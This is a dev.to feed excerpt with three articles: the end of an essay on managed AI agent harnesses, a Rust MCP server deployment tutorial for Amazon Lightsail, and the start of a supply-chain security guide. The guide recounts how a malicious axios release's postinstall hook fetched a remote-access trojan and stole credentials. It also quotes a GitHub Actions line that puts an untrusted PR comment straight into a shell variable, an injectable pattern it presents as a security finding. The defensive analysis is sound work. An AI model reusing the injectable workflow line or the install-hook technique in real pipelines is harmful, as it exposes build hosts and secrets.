&lt;p&gt;I partially agree with this counterargument. If you're building a new agent for organizational production from zero, going in through managed harness is faster, I think. However, the design of an agent to run in production rarely "is visible from the start." Only by actually using the agent do the granularity of knowledge, the over- and under-supply of tools, and the boundaries of responsibility come into view. Whether you run this discovery flow on top of a managed harness with set boundaries, or on a self-built harness with high freedom, changes the amount of learning you get.&lt;/p&gt;

&lt;p&gt;Another perspective: judgments gained from self-built operation can be reused as a blueprint when you migrate to managed harness. If you go into managed harness without a blueprint, you can produce something that appears to work, but a system remains where it's hard to explain why it was structured that way. Whether "let's just put it on managed harness and improve it as we go" works depends on whether one person is improving or multiple people are improving. For one person, the iteration speed gap between self-built and managed may be small; but at the stage where multiple people improve, the declarative changes in &lt;code&gt;harness.json&lt;/code&gt; and the deploy-unit iteration cycle start to take a toll as operational debt.&lt;/p&gt;

&lt;h2&gt;
  
  
  Order of adoption: where personal and organizational use diverge
&lt;/h2&gt;

&lt;p&gt;Whether to adopt managed harness can naturally branch by operational scale. Let me go through three stages.&lt;/p&gt;

&lt;p&gt;In the personal-use stage, where one person is using the agent, the self-built harness is often sufficient. The editing and use of knowledge files are tightly coupled, and the iteration of "rewrite Markdown the moment you notice something while using it" runs fast. Both Identity and Observability are hard to recognize as gaps as long as you're operating solo, and end up in the "would-be-nice-to-have, maybe" zone. In the experimental stage, this freedom directly translates into learning speed.&lt;/p&gt;

&lt;p&gt;At the stage of expanding to organizational operation where multiple people use the agent, the four blank layers all surface as problems at once. You need audit logs of who used which agent how (Observability); you start running into situations where shared environments must not allow tools to be called freely, so boundaries become necessary (Policy); you need to manage credentials per member (Identity); you want to continuously measure agent response quality (Evaluations). At this stage, the value of managed harness comes to the fore. Comparing the labor of writing the four layers yourself versus putting them on AgentCore, the latter becomes practical.&lt;/p&gt;

&lt;p&gt;In the transition phase, you can take a hybrid strategy. Continue the personal exploration stage with a self-built harness, and put only the confirmed paths used in organizational operation onto managed harness. Move agents whose design has settled to AgentCore in order, and keep agents that are still being learned on while running close at hand.&lt;/p&gt;

&lt;p&gt;There's also a guideline for the order of adoption. The first things needed for organizational deployment are Identity and Observability, then Policy, and finally Evaluations. Without Identity, sharing itself doesn't get established. Without Observability, the organization can't make operational judgments. Policy is often too late after an incident, so placing it early in organizational deployment is safer. Evaluations can come in the order of "after operation gets going, then introduce quality measurement"—that's fine.&lt;/p&gt;

&lt;p&gt;The harness was originally a concept lying at the boundary between those who build agents and those who use them. With AWS releasing managed harness, part of what we used to assemble by hand has shifted into a mechanism that runs simply by declaring it as configuration. The fact that layers like Identity, Observability, and Policy—which I had given up on as self-built—have come within reach is no small thing.&lt;/p&gt;

&lt;p&gt;Even so, design judgments such as "what is this agent for," "what to leave in the knowledge," and "how far to grant tools authority" haven't been put into a form you can declare as configuration. The basis of these judgments will continue to live in the commit history and work logs of one's own repository. The experience of having built a self-built harness leaves behind, in your hands, knowledge that doesn't lose its value when you migrate to managed. With the arrival of managed harness, the boundary between "the layers we build ourselves" and "the layers only human judgment can carry" has become more clearly visible than before, you might say.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>agents</category>
      <category>ai</category>
      <category>bedrock</category>
    </item>
    <item>
      <title>Deploying a Rust MCP Server to Amazon LightSail</title>
      <dc:creator>xbill</dc:creator>
      <pubDate>Fri, 08 May 2026 18:01:57 +0000</pubDate>
      <link>https://dev.to/aws-builders/deploying-a-rust-mcp-server-to-amazon-lightsail-23j4</link>
      <guid>https://dev.to/aws-builders/deploying-a-rust-mcp-server-to-amazon-lightsail-23j4</guid>
      <description>&lt;p&gt;The rmcp crate and standard Rust libraries are used to build a basic MCP Server in Rust. This MCP Server is then built and deployed to AWS LightSail and validated locally with Gemini CLI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagqvrcvpfmyskr0s5a60.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagqvrcvpfmyskr0s5a60.jpeg" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  More MCP Demos?
&lt;/h4&gt;

&lt;p&gt;Yes sir. Ferris the Crab demands it.&lt;/p&gt;

&lt;h4&gt;
  
  
  Why not just use Python?
&lt;/h4&gt;

&lt;p&gt;Python has traditionally been the main coding language for ML and AI tools. One of the strengths of the MCP protocol is that the actual implementation details are independent of the development language. The reality is that not every project is coded in Python- and MCP allows you to use the latest AI appt roaches with other coding languages.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is this Tutorial Trying to Do?
&lt;/h4&gt;

&lt;p&gt;Building on previous tutorials, the goal is to extend a Rust MCP server with basic support for deployment to AWS.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Rust?
&lt;/h4&gt;

&lt;p&gt;Rust is a high performance, memory safe, compiled language:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.rust-lang.org/" rel="noopener noreferrer"&gt;Rust&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rust provides memory safe operations beyond C/C++ and also can provide exceptional performance gains as it is compiled directly to native binaries.&lt;/p&gt;

&lt;h4&gt;
  
  
  So is this the real Slim Shady?
&lt;/h4&gt;

&lt;p&gt;So what is different about this lab compared to all the others out there?&lt;/p&gt;

&lt;p&gt;This is one of the first deep dives into deploying a Rust based MCP server hosted on AWS. The Amazon LightSail service was targeted for ease of setup and deployment.&lt;/p&gt;

&lt;h4&gt;
  
  
  Rust Setup
&lt;/h4&gt;

&lt;p&gt;Instructions to install Rust are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.rust-lang.org/learn/get-started" rel="noopener noreferrer"&gt;Getting started&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For a Linux like environment the command looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl — proto ‘&lt;span class="o"&gt;=&lt;/span&gt;https’ — tlsv1.2 &lt;span class="nt"&gt;-sSf&lt;/span&gt; https://sh.rustup.rs | sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Rust also depends on a working C compiler and OpenSSL setup. For a Debian 12 system — install the basic tools for development:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;build-essential
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;libssl-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;pkg-config
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libudev-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;make
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Gemini CLI
&lt;/h4&gt;

&lt;p&gt;If not pre-installed you can download the Gemini CLI to interact with the source files and provide real-time assistance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @google/gemini-cli
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Testing the Gemini CLI Environment
&lt;/h4&gt;

&lt;p&gt;Once you have all the tools and the correct Node.js version in place- you can test the startup of Gemini CLI. You will need to authenticate with a Key or your Google Account:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;▝▜▄ Gemini CLI v0.33.1
    ▝▜▄
   ▗▟▀ Logged in with Google /auth
  ▝▀ Gemini Code Assist Standard /upgrade no sandbox (see /docs) /model Auto (Gemini 3) | 239.8 MB
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  AWS CLI
&lt;/h4&gt;

&lt;p&gt;The AWS CLI provides a command line tool to directly access AWS services from your current environment. Full details on the CLI are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-install-software.html" rel="noopener noreferrer"&gt;Install Docker, AWS CLI, and the Lightsail Control plugin for containers&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can version check the tool after installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsai-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="go"&gt;aws-cli/2.34.43 Python/3.14.4 Linux/6.6.99-09128-g14e87a8a9b71 exe/x86_64.debian.12

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Amazon Lightsail
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/lightsail/" rel="noopener noreferrer"&gt;Amazon Lightsail&lt;/a&gt; is an easy-to-use virtual private server (VPS) provider and cloud platform designed by AWS for simpler workloads, offering developers pre-configured compute, storage, and networking for a low, predictable monthly price. It is ideal for hosting small websites, simple web apps, or creating development environments.&lt;/p&gt;

&lt;p&gt;More information is available on the official site here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/free/compute/lightsail/?trk=93c1c080-6a58-41f6-b56e-f352c703feb6&amp;amp;sc_channel=ps&amp;amp;ef_id=CjwKCAjwjtTNBhB0EiwAuswYhjYfDAdZvphotoys8sw1RlOcuvMz1mu6mp0MulOUryHwrqsyynfDEhoCxTEQAvD_BwE:G:s&amp;amp;s_kwcid=AL!4422!3!795794191906!e!!g!!amazon%20lightsail!23527793966!192204323906&amp;amp;gad_campaignid=23527793966&amp;amp;gbraid=0AAAAADjHtp_DJwRcBBdbHLaptszTVpfxR&amp;amp;gclid=CjwKCAjwjtTNBhB0EiwAuswYhjYfDAdZvphotoys8sw1RlOcuvMz1mu6mp0MulOUryHwrqsyynfDEhoCxTEQAvD_BwE" rel="noopener noreferrer"&gt;Amazon's Simple Cloud Server | Amazon Lightsail&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And this is the direct URL to the console:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://lightsail.aws.amazon.com/ls/webapp/home/containers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Lightsail console will look similar to:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftn56gyfjoo1ykni5gh0z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftn56gyfjoo1ykni5gh0z.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Setup the Basic Environment
&lt;/h4&gt;

&lt;p&gt;At this point you should have a working Rust environment and a working Gemini CLI installation. All of the relevant code examples and documentation is available in GitHub.&lt;/p&gt;

&lt;p&gt;The next step is to clone the GitHub repository to your local environment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~
git clone https://github.com/xbill9/gemini-cli-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run &lt;strong&gt;init.sh&lt;/strong&gt; from the cloned directory.&lt;/p&gt;

&lt;p&gt;The script will attempt to determine your shell environment and set the correct variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;source &lt;/span&gt;init.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your session times out or you need to re-authenticate- you can run the &lt;strong&gt;set_env.sh&lt;/strong&gt; script to reset your environment variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;source &lt;/span&gt;set_env.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Variables like PROJECT_ID need to be setup for use in the various build scripts- so the &lt;strong&gt;set_env&lt;/strong&gt; script can be used to reset the environment if you time-out.&lt;/p&gt;

&lt;p&gt;Refresh the AWS credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws login &lt;span class="nt"&gt;--remote&lt;/span&gt;
&lt;span class="go"&gt;Browser will not be automatically opened.

&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ligthsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;source &lt;/span&gt;save-aws-creds.sh 
&lt;span class="go"&gt;Exporting AWS credentials...
Successfully saved credentials to .aws_creds
The Makefile will now automatically use these for deployments.

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally install the packages and dependencies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~/gemini-cli-aws/mcp-lightsail-rust-aws 
make &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Build The Rust MCP Server
&lt;/h4&gt;

&lt;p&gt;Some background information on building and configuring a Rust MCP server is here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://xbill999.medium.com/building-a-secure-http-transport-mcp-server-with-rust-and-gemini-cli-b4e807e7aa1d" rel="noopener noreferrer"&gt;Building a Secure HTTP Transport MCP Server with Rust, and Gemini CLI&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The mcp-lightsail-rust subdirectory has the complete Rust MCP server in one subdirectory.&lt;/p&gt;

&lt;h4&gt;
  
  
  Minimal System Information Tool Build
&lt;/h4&gt;

&lt;p&gt;The first step is to build the basic tool directly with Rust. This allows the tool to be debugged and tested locally before adding the MCP layer.&lt;/p&gt;

&lt;p&gt;First build the tool locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make
&lt;span class="go"&gt;Building the Rust project...
   Compiling mcp-lightsail-rust-aws v1.0.0 (/home/xbill/gemini-cli-aws/mcp-lightsail-rust-aws)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 7.67s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;then lint check the code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make lint
&lt;span class="go"&gt;Linting code...
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.61s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and run local tests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make &lt;span class="nb"&gt;test&lt;/span&gt;
&lt;span class="go"&gt;Running tests...
    Finished `test` profile [unoptimized + debuginfo] target(s) in 0.22s
     Running unittests src/main.rs (target/debug/deps/mcp_lightsail_rust_aws-926af5aee1927183)

running 1 test
test tests::test_greeting ... ok

&lt;/span&gt;&lt;span class="gp"&gt;test result: ok. 1 passed;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;0 failed&lt;span class="p"&gt;;&lt;/span&gt; 0 ignored&lt;span class="p"&gt;;&lt;/span&gt; 0 measured&lt;span class="p"&gt;;&lt;/span&gt; 0 filtered out&lt;span class="p"&gt;;&lt;/span&gt; finished &lt;span class="k"&gt;in &lt;/span&gt;0.00s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The last step is to build the production version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make release
&lt;span class="go"&gt;Building Release...
   Compiling mcp-lightsail-rust-aws v1.0.0 (/home/xbill/gemini-cli-aws/mcp-lightsail-rust-aws)
    Finished `release` profile [optimized] target(s) in 43.31s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The MCP server can be started locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/mcp-adk-rust/mcp-cloudrun-rust$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make start
&lt;span class="go"&gt;Building Release...
    Finished `release` profile [optimized] target(s) in 0.14s
Starting the MCP server...
Server started with PID 1569
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then Gemini CLI is used as a MCP client:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🟢 local-rust - Ready (1 tool)
  Tools:
  - mcp_local-rust_greeting
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The MCP tool can then be tested:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; mcp_local-rust_greeting local

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Action Required │
│ │
│ ? greeting (local-rust MCP Server) {"message":"local"} │
│ │
│ MCP Server: local-rust │
│ Tool: greeting │
│ │
│ MCP Tool Details: │
│ (press Ctrl+O to expand MCP tool details) │
│ Allow execution of MCP tool "greeting" from server "local-rust"? │
│ │
│ 1. Allow once │
│ 2. Allow tool for this session │
│ 3. Allow all server tools for this session │
│ ● 4. Allow tool for all future sessions ~/.gemini/policies/auto-saved.toml │
│ 5. No, suggest changes (esc) │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The mcp_local-rust_greeting tool was executed with the message "local", returning:
  "Hello World MCP! local"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Deploy To LightSail
&lt;/h4&gt;

&lt;p&gt;A basic Dockerfile is used to build an image for deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make deploy
&lt;span class="go"&gt;Building the Docker image...
[+] Building 5.3s (15/15) FINISHED docker:default
&lt;/span&gt;&lt;span class="gp"&gt; =&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;internal] load build definition from Dockerfile 0.0s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Get the Endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make endpoint
&lt;span class="go"&gt;https://mcp-lightsail-rust-aws.6wpv8vensby5c.us-east-1.cs.amazonlightsail.com/
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Check Gemini MCP settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"aws-lightsail-rust"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://mcp-lightsail-rust-aws.6wpv8vensby5c.us-east-1.cs.amazonlightsail.com/mcp"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"local-rust"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"http://127.0.0.1:8080/mcp"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The service will be visible on the LightSail console:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4skqmyztkiwvlm1yvspw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4skqmyztkiwvlm1yvspw.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Final Test
&lt;/h4&gt;

&lt;p&gt;Start up Gemini CLI and check the MCP server status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🟢 aws-lightsail-rust - Ready (1 tool)
  Tools:
  - mcp_aws-lightsail-rust_greeting

&amp;gt; mcp_aws-lightsail-rust_greeting Hello LightSail!

  Executing Lightsail Greeting: Executing the greeting tool for Amazon Lightsail Rust MCP server.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ greeting (aws-lightsail-rust MCP Server) {"message":"Hello LightSail!"} │
│ │
│ Hello World MCP! Hello LightSail! │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The mcp_aws-lightsail-rust_greeting tool returned:

  Hello World MCP! Hello LightSail!

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Summary
&lt;/h4&gt;

&lt;p&gt;A complete HTTP transport MCP server was built using Rust. This application was tested locally with Gemini CLI. Then, the entire solution was deployed to AWS LightSail. The remote MCP server was validated with Gemini CLI locally.&lt;/p&gt;

</description>
      <category>awslightsail</category>
      <category>dockerfiles</category>
      <category>mcps</category>
      <category>gemini</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:48:03 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1o4m</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1o4m</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch, a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0"; most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. (&lt;code&gt;postinstall&lt;/code&gt; is the canonical Node footgun, a hook the package manager runs automatically after install, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt;.) The compromise wouldn't have been visible to anyone glancing at the lockfile diff: a new transitive in a stable utility, the kind of churn most teams approve without thinking.&lt;/p&gt;

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



